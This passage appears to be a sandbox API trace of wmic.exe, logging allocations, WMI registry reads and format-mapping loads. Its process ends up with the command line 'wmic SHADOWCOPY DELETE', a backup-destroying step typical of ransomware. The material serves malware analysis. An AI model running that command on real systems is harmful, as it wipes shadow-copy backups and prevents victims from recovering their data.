9 [0096.565] malloc (_Size=0x14) returned 0x1a2860 [0096.565] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.565] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.565] malloc (_Size=0x14) returned 0x1a28c8 [0096.565] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.565] malloc (_Size=0x4) returned 0x1a28e8 [0096.565] malloc (_Size=0xc) returned 0x1a28f8 [0096.565] malloc (_Size=0x18) 
returned 0x1a2910 [0096.565] malloc (_Size=0xc) returned 0x1a2930 [0096.565] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.565] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.566] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.566] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.566] malloc (_Size=0x18) returned 0x1a2948 [0096.566] malloc (_Size=0xc) returned 0x1a2968 [0096.566] SysStringLen (param_1="IMPERSONATE") returned 0xb [0096.566] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.566] SysStringLen (param_1="IMPERSONATE") returned 0xb [0096.566] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.566] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.566] SysStringLen (param_1="IMPERSONATE") returned 0xb [0096.566] malloc (_Size=0x18) returned 0x1a2980 [0096.566] malloc (_Size=0xc) returned 0x1a29a0 [0096.566] SysStringLen (param_1="DELEGATE") returned 0x8 [0096.566] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.566] SysStringLen (param_1="DELEGATE") returned 0x8 [0096.566] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.566] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.567] SysStringLen (param_1="DELEGATE") returned 0x8 [0096.567] malloc (_Size=0x18) returned 0x1a29b8 [0096.567] malloc (_Size=0xc) returned 0x1a29d8 [0096.567] malloc (_Size=0x18) returned 0x1a29f0 [0096.567] malloc (_Size=0xc) returned 0x1a2a10 [0096.567] SysStringLen (param_1="NONE") returned 0x4 [0096.567] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.567] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.567] SysStringLen (param_1="NONE") returned 0x4 [0096.567] malloc (_Size=0x18) returned 0x1a2a28 [0096.567] malloc (_Size=0xc) returned 0x1a2a48 [0096.569] SysStringLen (param_1="CONNECT") returned 0x7 [0096.569] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.569] malloc (_Size=0x18) returned 0x1a2a60 [0096.569] malloc (_Size=0xc) returned 0x1a2a80 [0096.572] SysStringLen (param_1="CALL") returned 0x4 [0096.572] 
SysStringLen (param_1="DEFAULT") returned 0x7 [0096.572] SysStringLen (param_1="CALL") returned 0x4 [0096.572] SysStringLen (param_1="CONNECT") returned 0x7 [0096.572] malloc (_Size=0x18) returned 0x1ae868 [0096.572] malloc (_Size=0xc) returned 0x1a2e98 [0096.572] SysStringLen (param_1="PKT") returned 0x3 [0096.572] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.572] SysStringLen (param_1="PKT") returned 0x3 [0096.572] SysStringLen (param_1="NONE") returned 0x4 [0096.572] SysStringLen (param_1="NONE") returned 0x4 [0096.572] SysStringLen (param_1="PKT") returned 0x3 [0096.572] malloc (_Size=0x18) returned 0x1ae888 [0096.572] malloc (_Size=0xc) returned 0x1a2eb0 [0096.572] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.573] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] SysStringLen (param_1="NONE") returned 0x4 [0096.573] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] SysStringLen (param_1="PKT") returned 0x3 [0096.573] SysStringLen (param_1="PKT") returned 0x3 [0096.573] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] malloc (_Size=0x18) returned 0x1ae8a8 [0096.573] malloc (_Size=0xc) returned 0x1a2ec8 [0096.573] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.573] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.573] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.573] SysStringLen (param_1="PKT") returned 0x3 [0096.573] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.573] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.573] malloc (_Size=0x18) returned 0x1ae8c8 [0096.573] malloc (_Size=0x40) returned 0x1a2ee0 [0096.573] malloc (_Size=0x20a) returned 0x1a2f28 [0096.573] GetSystemDirectoryW (in: lpBuffer=0x1a2f28, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0096.574] free 
(_Block=0x1a2f28) [0096.574] malloc (_Size=0xc) returned 0x1a2f28 [0096.574] malloc (_Size=0xc) returned 0x1a2f40 [0096.574] malloc (_Size=0xc) returned 0x1a2f58 [0096.574] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0096.574] SysStringLen (param_1="\\wbem\\") returned 0x6 [0096.574] free (_Block=0x1a2f28) [0096.574] free (_Block=0x1a2f40) [0096.574] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0096.574] free (_Block=0x1a2f58) [0096.574] malloc (_Size=0xc) returned 0x1a2f28 [0096.574] malloc (_Size=0xc) returned 0x1a2f40 [0096.574] malloc (_Size=0xc) returned 0x1a2f58 [0096.574] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0096.574] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0096.575] free (_Block=0x1a2f28) [0096.575] free (_Block=0x1a2f40) [0096.575] GetCurrentThreadId () returned 0x20c [0096.575] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xcf4a8 | out: phkResult=0xcf4a8*=0x10c) returned 0x0 [0096.575] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xcf4b4, lpcbData=0xcf4b0*=0x400 | out: lpType=0x0, lpData=0xcf4b4*=0x30, lpcbData=0xcf4b0*=0x4) returned 0x0 [0096.575] _wcsicmp (_String1="0", _String2="1") returned -1 [0096.575] _wcsicmp (_String1="0", _String2="2") returned -2 [0096.575] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xcf4b0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xcf4b0*=0x42) returned 0x0 [0096.575] malloc (_Size=0x86) returned 0x1a2f70 [0096.575] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x1a2f70, lpcbData=0xcf4b0*=0x42 | out: lpType=0x0, lpData=0x1a2f70*=0x25, lpcbData=0xcf4b0*=0x42) returned 0x0 [0096.576] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0096.576] malloc (_Size=0x42) 
returned 0x1a3000 [0096.576] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0096.576] RegQueryValueExW (in: hKey=0x10c, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xcf4b4, lpcbData=0xcf4b0*=0x400 | out: lpType=0x0, lpData=0xcf4b4*=0x36, lpcbData=0xcf4b0*=0xc) returned 0x0 [0096.576] _wtol (_String="65536") returned 65536 [0096.576] free (_Block=0x1a2f70) [0096.576] RegCloseKey (hKey=0x0) returned 0x6 [0096.576] CoCreateInstance (in: rclsid=0x9f6d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x9f6d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xcf944 | out: ppv=0xcf944*=0x24c4630) returned 0x0 [0100.927] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x24c4630, xmlSource=0xcf8c8*(varType=0x8, wReserved1=0xffff, wReserved2=0x387a, wReserved3=0x77c7, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xcf92c | out: isSuccessful=0xcf92c*=0xffff) returned 0x0 [0103.987] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x24c4630, DOMElement=0xcf940 | out: DOMElement=0xcf940) returned 0x0 [0103.987] malloc (_Size=0xc) returned 0x1a2f28 [0103.988] free (_Block=0x1a2f28) [0103.988] malloc (_Size=0xc) returned 0x1a2f28 [0103.988] free (_Block=0x1a2f28) [0103.988] malloc (_Size=0xc) returned 0x1a2f28 [0103.988] malloc (_Size=0xc) returned 0x1a2f40 [0103.988] malloc (_Size=0x18) returned 0x1ae8e8 [0103.989] malloc (_Size=0xc) returned 0x1a3160 [0103.989] free (_Block=0x1a3160) [0103.989] malloc (_Size=0xc) returned 0x1a3160 [0103.989] malloc (_Size=0xc) returned 0x1a3178 [0103.989] SysStringLen (param_1="VALUE") returned 0x5 [0103.989] SysStringLen (param_1="TABLE") returned 0x5 [0103.989] SysStringLen (param_1="TABLE") returned 0x5 [0103.989] 
SysStringLen (param_1="VALUE") returned 0x5 [0103.989] malloc (_Size=0x18) returned 0x1ae908 [0103.990] malloc (_Size=0xc) returned 0x1a3190 [0103.990] free (_Block=0x1a3190) [0103.990] malloc (_Size=0xc) returned 0x1afac8 [0103.990] malloc (_Size=0xc) returned 0x1afae0 [0103.990] SysStringLen (param_1="LIST") returned 0x4 [0103.990] SysStringLen (param_1="TABLE") returned 0x5 [0103.990] malloc (_Size=0x18) returned 0x1ae928 [0103.991] malloc (_Size=0xc) returned 0x1afaf8 [0103.991] free (_Block=0x1afaf8) [0103.991] malloc (_Size=0xc) returned 0x1afaf8 [0103.991] malloc (_Size=0xc) returned 0x1afb10 [0103.991] SysStringLen (param_1="RAWXML") returned 0x6 [0103.991] SysStringLen (param_1="TABLE") returned 0x5 [0103.991] SysStringLen (param_1="RAWXML") returned 0x6 [0103.991] SysStringLen (param_1="LIST") returned 0x4 [0103.991] SysStringLen (param_1="LIST") returned 0x4 [0103.991] SysStringLen (param_1="RAWXML") returned 0x6 [0103.991] malloc (_Size=0x18) returned 0x1ae948 [0103.992] malloc (_Size=0xc) returned 0x1afb28 [0103.992] free (_Block=0x1afb28) [0103.992] malloc (_Size=0xc) returned 0x1afb28 [0103.992] malloc (_Size=0xc) returned 0x1afb40 [0103.992] SysStringLen (param_1="HTABLE") returned 0x6 [0103.992] SysStringLen (param_1="TABLE") returned 0x5 [0103.992] SysStringLen (param_1="HTABLE") returned 0x6 [0103.992] SysStringLen (param_1="LIST") returned 0x4 [0103.992] malloc (_Size=0x18) returned 0x1ae968 [0103.993] malloc (_Size=0xc) returned 0x1afb58 [0103.993] free (_Block=0x1afb58) [0103.993] malloc (_Size=0xc) returned 0x1afb58 [0103.993] malloc (_Size=0xc) returned 0x1afb70 [0103.993] SysStringLen (param_1="HFORM") returned 0x5 [0103.993] SysStringLen (param_1="TABLE") returned 0x5 [0103.993] SysStringLen (param_1="HFORM") returned 0x5 [0103.993] SysStringLen (param_1="LIST") returned 0x4 [0103.993] SysStringLen (param_1="HFORM") returned 0x5 [0103.993] SysStringLen (param_1="HTABLE") returned 0x6 [0103.993] malloc (_Size=0x18) returned 0x1ae988 
[0103.994] malloc (_Size=0xc) returned 0x1afb88 [0103.994] free (_Block=0x1afb88) [0103.994] malloc (_Size=0xc) returned 0x1afb88 [0103.994] malloc (_Size=0xc) returned 0x1afba0 [0103.994] SysStringLen (param_1="XML") returned 0x3 [0103.994] SysStringLen (param_1="TABLE") returned 0x5 [0103.994] SysStringLen (param_1="XML") returned 0x3 [0103.994] SysStringLen (param_1="VALUE") returned 0x5 [0103.994] SysStringLen (param_1="VALUE") returned 0x5 [0103.994] SysStringLen (param_1="XML") returned 0x3 [0103.994] malloc (_Size=0x18) returned 0x1ae9a8 [0103.995] malloc (_Size=0xc) returned 0x1afbb8 [0103.995] free (_Block=0x1afbb8) [0103.997] malloc (_Size=0xc) returned 0x1afbb8 [0103.997] malloc (_Size=0xc) returned 0x1afbd0 [0103.997] SysStringLen (param_1="MOF") returned 0x3 [0103.997] SysStringLen (param_1="TABLE") returned 0x5 [0103.997] SysStringLen (param_1="MOF") returned 0x3 [0103.997] SysStringLen (param_1="LIST") returned 0x4 [0103.997] SysStringLen (param_1="MOF") returned 0x3 [0103.997] SysStringLen (param_1="RAWXML") returned 0x6 [0103.997] SysStringLen (param_1="LIST") returned 0x4 [0103.997] SysStringLen (param_1="MOF") returned 0x3 [0103.997] malloc (_Size=0x18) returned 0x1ae9c8 [0103.998] malloc (_Size=0xc) returned 0x1afbe8 [0103.998] free (_Block=0x1afbe8) [0103.998] malloc (_Size=0xc) returned 0x1afbe8 [0103.998] malloc (_Size=0xc) returned 0x1afc00 [0103.998] SysStringLen (param_1="CSV") returned 0x3 [0103.998] SysStringLen (param_1="TABLE") returned 0x5 [0103.998] SysStringLen (param_1="CSV") returned 0x3 [0103.998] SysStringLen (param_1="LIST") returned 0x4 [0103.998] SysStringLen (param_1="CSV") returned 0x3 [0103.998] SysStringLen (param_1="HTABLE") returned 0x6 [0103.998] SysStringLen (param_1="CSV") returned 0x3 [0103.998] SysStringLen (param_1="HFORM") returned 0x5 [0103.998] malloc (_Size=0x18) returned 0x1ae9e8 [0103.999] malloc (_Size=0xc) returned 0x1afc18 [0103.999] free (_Block=0x1afc18) [0103.999] malloc (_Size=0xc) returned 0x1afc18 
[0103.999] malloc (_Size=0xc) returned 0x1afc30 [0103.999] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.999] SysStringLen (param_1="TABLE") returned 0x5 [0103.999] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.999] SysStringLen (param_1="VALUE") returned 0x5 [0103.999] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.999] SysStringLen (param_1="XML") returned 0x3 [0103.999] SysStringLen (param_1="XML") returned 0x3 [0103.999] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.999] malloc (_Size=0x18) returned 0x1aea08 [0104.000] malloc (_Size=0xc) returned 0x1afc48 [0104.000] free (_Block=0x1afc48) [0104.000] malloc (_Size=0xc) returned 0x1afc48 [0104.000] malloc (_Size=0xc) returned 0x1afc60 [0104.000] SysStringLen (param_1="texttablewsys") returned 0xd [0104.000] SysStringLen (param_1="TABLE") returned 0x5 [0104.000] SysStringLen (param_1="texttablewsys") returned 0xd [0104.000] SysStringLen (param_1="XML") returned 0x3 [0104.000] SysStringLen (param_1="texttablewsys") returned 0xd [0104.000] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.000] SysStringLen (param_1="XML") returned 0x3 [0104.000] SysStringLen (param_1="texttablewsys") returned 0xd [0104.000] malloc (_Size=0x18) returned 0x1aea28 [0104.001] malloc (_Size=0xc) returned 0x1afc78 [0104.001] free (_Block=0x1afc78) [0104.001] malloc (_Size=0xc) returned 0x1afc78 [0104.001] malloc (_Size=0xc) returned 0x1afc90 [0104.001] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.001] SysStringLen (param_1="TABLE") returned 0x5 [0104.001] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.001] SysStringLen (param_1="XML") returned 0x3 [0104.001] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.001] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.001] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.002] SysStringLen (param_1="wmiclitableformat.xsl") returned 
0x15 [0104.002] malloc (_Size=0x18) returned 0x1aea48 [0104.002] malloc (_Size=0xc) returned 0x1afca8 [0104.002] free (_Block=0x1afca8) [0104.002] malloc (_Size=0xc) returned 0x1afca8 [0104.002] malloc (_Size=0xc) returned 0x1afcc0 [0104.002] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.002] SysStringLen (param_1="TABLE") returned 0x5 [0104.002] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.002] SysStringLen (param_1="XML") returned 0x3 [0104.002] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.002] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.003] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.003] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.003] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.003] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.003] malloc (_Size=0x18) returned 0x1aea68 [0104.003] malloc (_Size=0xc) returned 0x1afcd8 [0104.003] free (_Block=0x1afcd8) [0104.003] malloc (_Size=0xc) returned 0x1afcd8 [0104.003] malloc (_Size=0xc) returned 0x1afcf0 [0104.003] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.003] SysStringLen (param_1="TABLE") returned 0x5 [0104.004] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.004] SysStringLen (param_1="XML") returned 0x3 [0104.004] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.004] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.004] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.004] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.004] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.004] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.004] malloc (_Size=0x18) returned 0x1aea88 [0104.004] malloc (_Size=0xc) returned 0x1afd08 [0104.004] free (_Block=0x1afd08) [0104.004] malloc (_Size=0xc) returned 0x1afd08 
[0104.004] malloc (_Size=0xc) returned 0x1afd20 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] SysStringLen (param_1="TABLE") returned 0x5 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] SysStringLen (param_1="XML") returned 0x3 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.005] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] malloc (_Size=0x18) returned 0x1aeaa8 [0104.005] malloc (_Size=0xc) returned 0x1afd38 [0104.006] free (_Block=0x1afd38) [0104.006] malloc (_Size=0xc) returned 0x1afd38 [0104.006] malloc (_Size=0xc) returned 0x1afd50 [0104.006] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.006] SysStringLen (param_1="TABLE") returned 0x5 [0104.006] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.006] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.006] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.006] SysStringLen (param_1="XML") returned 0x3 [0104.006] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.006] SysStringLen (param_1="texttablewsys") returned 0xd [0104.006] SysStringLen (param_1="XML") returned 0x3 [0104.006] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.006] malloc (_Size=0x18) returned 0x1aeac8 [0104.007] malloc (_Size=0xc) returned 0x1afd68 [0104.007] free (_Block=0x1afd68) [0104.007] malloc (_Size=0xc) returned 0x1afd68 [0104.007] malloc (_Size=0xc) returned 0x1afd80 [0104.007] SysStringLen 
(param_1="htable-sortby") returned 0xd [0104.007] SysStringLen (param_1="TABLE") returned 0x5 [0104.007] SysStringLen (param_1="htable-sortby") returned 0xd [0104.007] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.007] SysStringLen (param_1="htable-sortby") returned 0xd [0104.007] SysStringLen (param_1="XML") returned 0x3 [0104.007] SysStringLen (param_1="htable-sortby") returned 0xd [0104.007] SysStringLen (param_1="texttablewsys") returned 0xd [0104.007] SysStringLen (param_1="htable-sortby") returned 0xd [0104.007] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.007] SysStringLen (param_1="XML") returned 0x3 [0104.007] SysStringLen (param_1="htable-sortby") returned 0xd [0104.007] malloc (_Size=0x18) returned 0x1aeae8 [0104.008] malloc (_Size=0xc) returned 0x1afd98 [0104.008] free (_Block=0x1afd98) [0104.008] malloc (_Size=0xc) returned 0x1afd98 [0104.008] malloc (_Size=0xc) returned 0x1afdb0 [0104.008] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.008] SysStringLen (param_1="TABLE") returned 0x5 [0104.008] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.008] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.008] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.008] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.008] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.008] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.008] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.008] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.009] malloc (_Size=0x18) returned 0x1aeb08 [0104.009] malloc (_Size=0xc) returned 0x1afdc8 [0104.009] free (_Block=0x1afdc8) [0104.009] malloc (_Size=0xc) returned 0x1afdc8 [0104.009] malloc (_Size=0xc) returned 0x1afde0 [0104.009] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.009] SysStringLen (param_1="TABLE") returned 0x5 [0104.009] SysStringLen 
(param_1="wmiclimofformat") returned 0xf [0104.009] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.009] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.009] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.010] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.010] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.010] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.010] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.010] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.010] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.010] malloc (_Size=0x18) returned 0x1aeb28 [0104.010] malloc (_Size=0xc) returned 0x1afdf8 [0104.010] free (_Block=0x1afdf8) [0104.010] malloc (_Size=0xc) returned 0x1afdf8 [0104.010] malloc (_Size=0xc) returned 0x1afe10 [0104.013] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.013] SysStringLen (param_1="TABLE") returned 0x5 [0104.013] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.013] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.013] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.013] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.013] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.013] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.013] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.013] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.013] malloc (_Size=0x18) returned 0x1aeb48 [0104.013] malloc (_Size=0xc) returned 0x1afe28 [0104.014] free (_Block=0x1afe28) [0104.014] malloc (_Size=0xc) returned 0x1afe28 [0104.014] malloc (_Size=0xc) returned 0x1afe40 [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.014] SysStringLen (param_1="TABLE") returned 0x5 [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 
0x11 [0104.014] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.014] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.014] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.014] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.014] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.014] malloc (_Size=0x18) returned 0x1aeb68 [0104.015] FreeThreadedDOMDocument:IUnknown:Release (This=0x24c4630) returned 0x0 [0104.015] free (_Block=0x1a2f58) [0104.015] GetCommandLineW () returned="wmic SHADOWCOPY DELETE" [0104.015] malloc (_Size=0x30) returned 0x1a3190 [0104.015] memcpy_s (in: _Destination=0x1a3190, _DestinationSize=0x2e, _Source=0x431976, _SourceSize=0x2e | out: _Destination=0x1a3190) returned 0x0 [0104.015] malloc (_Size=0xc) returned 0x1afe58 [0104.015] malloc (_Size=0xc) returned 0x1afe70 [0104.015] malloc (_Size=0xc) returned 0x1afe88 [0104.015] malloc (_Size=0xc) returned 0x2312060 [0104.015] malloc (_Size=0x80) returned 0x23105b0 [0104.015] GetLocalTime (in: lpSystemTime=0xcf908 | out: lpSystemTime=0xcf908*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x0, wDay=0x13, wHour=0x16, wMinute=0x1c, wSecond=0xa, wMilliseconds=0x3be)) [0104.015] _vsnwprintf (in: _Buffer=0x23105b0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xcf8e8 | out: _Buffer="04-19-2020T22:28:10") returned 19 [0104.015] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.015] malloc (_Size=0x28) returned 0x1a31c8 [0104.015] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.015] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.015] malloc (_Size=0x28) returned 0x1a31f8 [0104.015] lstrlenW 
(lpString=" SHADOWCOPY DELETE") returned 19 [0104.016] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.016] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.016] malloc (_Size=0x16) returned 0x1aeb88 [0104.016] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.016] _wcsicmp (_String1="SHADOWCOPY", _String2="\"NULL\"") returned 81 [0104.016] malloc (_Size=0x16) returned 0x1aeba8 [0104.016] malloc (_Size=0x4) returned 0x1a3228 [0104.016] free (_Block=0x0) [0104.016] free (_Block=0x1aeb88) [0104.016] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.016] malloc (_Size=0xe) returned 0x2312078 [0104.016] lstrlenW (lpString="DELETE") returned 6 [0104.016] _wcsicmp (_String1="DELETE", _String2="\"NULL\"") returned 66 [0104.016] malloc (_Size=0xe) returned 0x2312090 [0104.016] malloc (_Size=0x8) returned 0x1a2f58 [0104.016] memmove_s (in: _Destination=0x1a2f58, _DestinationSize=0x4, _Source=0x1a3228, _SourceSize=0x4 | out: _Destination=0x1a2f58) returned 0x0 [0104.016] free (_Block=0x1a3228) [0104.016] free (_Block=0x0) [0104.016] free (_Block=0x2312078) [0104.016] malloc (_Size=0x8) returned 0x1a3228 [0104.016] lstrlenW (lpString="QUIT") returned 4 [0104.016] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.016] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0104.016] lstrlenW (lpString="EXIT") returned 4 [0104.016] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.016] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0104.016] free (_Block=0x1a3228) [0104.016] WbemLocator:IUnknown:AddRef (This=0x2000828) returned 0x2 [0104.016] malloc (_Size=0x8) returned 0x1a3228 [0104.016] lstrlenW (lpString="/") returned 1 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, 
